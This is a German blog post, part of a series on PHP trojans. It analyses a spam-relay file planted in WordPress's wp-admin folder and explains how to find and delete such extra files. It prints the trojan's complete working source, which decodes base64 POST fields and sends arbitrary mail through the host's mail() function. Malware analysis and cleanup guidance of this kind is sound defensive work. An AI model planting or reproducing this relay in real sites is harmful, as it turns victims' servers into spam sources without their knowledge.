Über den Author / Internet / PHP Trojaner (Teil 3: Spamsender Infektion)

PHP Trojaner (Teil 3: Spamsender Infektion)

~2 Min. Lesezeit

Spam ist ein grosses Problem der heutigen Zeit, doch wer verschickt Spam und warum sind die Personen so schlecht auffindbar?

Die Frage ist einfach zu klären. Vielleicht Du! Ein kleines unscheinbares PHP Skript und schon wird man selbst zur grössten Spamschleuder.

Spamsender Infektion

Der Tojaner besteht aus 1 Datei:
wp-admin/link-parse-form.php
Diese Datei gehören nicht zu WordPress und wurde zusätzlich installiert.

Der Inhalt der Datei:
wp-admin/link-parse-form.php

if(isset($_POST["mailto"])){$MailTo=base64_decode($_POST["mailto"]);} 
else{echo "indata_error"; exit;} 
if(isset($_POST["msgheader"])){$MessageHeader=base64_decode($_POST["msgheader"]);} 
else{echo "indata_error"; exit;} 
if(isset($_POST["msgbody"])){$MessageBody=base64_decode($_POST["msgbody"]);} 
else{echo "indata_error"; exit;} 
if(isset($_POST["msgsubject"])){$MessageSubject=base64_decode($_POST["msgsubject"]);} 
else{echo "indata_error"; exit;} 
if(mail($MailTo,$MessageSubject,$MessageBody,$MessageHeader)){echo "sent_ok";} 
else{echo "sent_error";}

Das war der komplette Code, welches euer Hosting in eine Spamschleuder verwandelt.

Was macht der Code?

Der Code wird mit einem Post angesprochen wo man diverse Variablen übermittelt. Wohin soll die Mail verschickt werden, von wem kommt diese, HTML / Plaintext Mail, Titel und Nachricht.

Der eigene Server verschickt dann diese Nachricht von dem Absender wo der Angreifer wählt und meldet diesem dann auch zurück ob es geklappt hat.

Pro Post eine Mail. Dies ist sehr schnell automatisiert und so verschickt man problemlos 100’000 Mails pro Tag wenn man Lust und Laune hat. Man selbst muss den Kopf dafür ja nicht hinhalten, ist ja nicht das eigene Hosting. Leider fällt dies fast nicht auf, da die Rückantwortadresse meist ins Nirvana läuft und der Mailserver nicht so sehr von Hostingfirmen kontrolliert wird.

Bereinigung

Die Bereinigung ist sehr einfach, da diese zusätzliche Dateien sind, welche nicht zu WordPress gehören und somit ersatzlos gelöscht werden können.
Bei WordPress kann man sehr schnell erkennen ob man solche zusätzlichen Dateien besitzt, welche nicht zu WordPress gehören, in dem die Anzahl der Dateien per FTP kontrolliert. Bei Abweichungen muss man nur die Datei suchen welche nicht zu WordPress gehört.

Standardmäsig hat WordPress 4.2.2 folgende Einträge:

wp-admin/ 87 Einträge (Ordner und Dateien)
wp-admin/includes/ 77 Dateien

Wer mehr Einträge verzeichnet, sollte diese Verzeichnisse mit einer sauberen WordPress Installation vergleichen.
Zusätzliche Dateien backupen (im Notfall) und danach löschen.

About Stefan

avatar
Ein männlicher IT Nerd, durchstöbert das Web nach speziellen Gadgets, unentbehrlicher Software und Alles was man im IT Sektor nicht verpassen darf.Immer hilfsbereit wenn Probleme zu lösen sind oder das Unmögliche umgesetzt werden sollte.

Weitere interessante Artikel

PHP Trojaner (Teil 4: Codierte Uploader Infektion)

~2 Min. LesezeitNicht jeder PHP Trojaner kann auf den ersten Blick identifiziert werden, was der …

PHP Trojaner (Teil 2: Uploader Infektion)

~1 Min. LesezeitPHP Trojaner sind beliebt, denn oft werden solche Infektionen übersehen und überstehen Jahre …

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

eMail-Benachrichtigung bei weiteren Kommentaren.
Auch möglich: Abo ohne Kommentar.